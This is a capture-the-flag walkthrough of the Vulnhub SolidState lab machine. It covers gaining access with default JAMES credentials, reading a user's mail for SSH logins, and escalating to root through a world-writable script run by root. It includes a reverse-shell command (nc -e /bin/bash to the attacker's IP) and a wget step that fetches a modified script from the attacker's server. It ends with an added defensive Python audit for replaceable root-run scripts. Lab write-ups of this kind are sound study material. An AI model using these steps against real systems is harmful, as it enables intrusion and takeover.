Vulnhub SolidState Walkthrough

We start, as always, by running nmap on the host to find open ports and other information:

nmap -T4 -A -p- 192.168.1.13 -vv

The host is running a service called JAMES. Port 4555 is the login, where we can log in using the default username and password, which is root.

Using the help command and then listusers, we can see the rest of the user names.

After we log in, we use help to show a list of commands, list the users with listusers, and then change everyone's passwords. After that we log in to the POP3 service using Telnet: telnet 192.168.1.13 110. We then use the commands USER mindy and PASS <password> to log in, and view the emails with RETR 1 or RETR 2, as she has two emails, 1 and 2:

When viewing the second email we find a username and password for the SSH service.

Logging in with the credentials we found:

After that, searching searchsploit for james gave us a Remote Command Execution exploit.

Just make a small edit to the script: put in nc -e /bin/bash 192.168.1.11 444, using your IP and a listening port.

Log out of mindy's SSH session, then run the script and log in again. Run python -c 'import pty;pty.spawn("/bin/bash")' and you will be able to run commands.

Now let's try to escalate to root privileges.

Using ps aux | grep root and ps aux | grep james:

We can see that it gave us a path to the opt folder.

Going to the opt folder, there is a tmp.py file.

But it seems that we can't edit the file, so we have to move it to our machine to edit it. We can edit it to make it return a connection back to us, or just to view the root.txt file in the root folder.

Start a SimpleHTTPServer on our machine and use wget to copy the file back to the host machine in the tmp folder, then copy it again to the opt folder and run it. We will find the file in the dev folder. We also need to find world-writable folders to copy the file there:

I tried the mqueue folder but it didn't work, so I tried the shm folder and it worked.
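
A defender-side check for the weakness this privilege escalation relies on: a script that root runs from the opt folder but that another user can modify or replace. This is an added example, not part of the original walkthrough; the function names and the temporary directory layout (including the modes given to tmp.py) are constructed for illustration.

```python
import os
import stat
import tempfile


def replaceable_by_others(path):
    """Reasons a user other than the owner could change what `path` runs."""
    reasons = []
    if os.stat(path).st_mode & stat.S_IWOTH:
        reasons.append("file is world-writable")
    parent = os.stat(os.path.dirname(os.path.abspath(path))).st_mode
    # A world-writable directory without the sticky bit lets any user delete
    # or rename entries, so a read-only script can still be swapped out.
    if parent & stat.S_IWOTH and not parent & stat.S_ISVTX:
        reasons.append("parent directory is world-writable without sticky bit")
    return reasons


def audit_tree(root):
    """Walk `root` and map each risky regular file to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # symlink modes are not meaningful on Linux
            reasons = replaceable_by_others(full)
            if reasons:
                findings[full] = reasons
    return findings


def demo():
    """Build a constructed stand-in for /opt and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.chmod(root, 0o755)
        layout = {"tmp.py": 0o777, "ok.py": 0o644, "drop/job.py": 0o644}
        os.mkdir(os.path.join(root, "drop"))
        for rel, mode in layout.items():
            full = os.path.join(root, rel)
            with open(full, "w") as fh:
                fh.write("# constructed sample\n")
            os.chmod(full, mode)
        os.chmod(os.path.join(root, "drop"), 0o777)
        found = audit_tree(root)
        return {os.path.relpath(p, root): r for p, r in found.items()}


if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(path, "->", "; ".join(reasons))
```

On a real host, call audit_tree on the directories that hold scripts run by root and tighten the mode or ownership of anything it reports.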
